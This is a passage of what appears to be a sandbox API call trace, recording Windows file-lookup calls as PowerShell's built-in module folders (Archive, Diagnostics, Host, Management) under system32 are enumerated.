hFindFile=0x1a592010) returned 1 [0177.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.093] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0177.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.094] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0177.094] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54 [0177.094] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.095] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.095] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0177.095] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0177.095] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.095] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0177.095] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54 [0177.096] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.096] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.096] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0177.096] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.096] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.097] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0177.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.097] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.097] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0177.097] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54 [0177.097] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.097] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.098] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0177.098] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0177.098] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.098] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0177.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.099] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0177.099] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d [0177.099] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.100] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.100] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0177.100] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0177.100] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.100] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0177.101] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d [0177.101] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.101] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.101] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0177.101] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.101] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.102] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0177.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.102] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.102] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0177.102] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d [0177.102] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.102] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.103] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0177.103] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0177.103] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.103] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0177.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.104] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0177.104] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53 [0177.104] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.105] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.105] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0177.105] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0177.105] FindClose 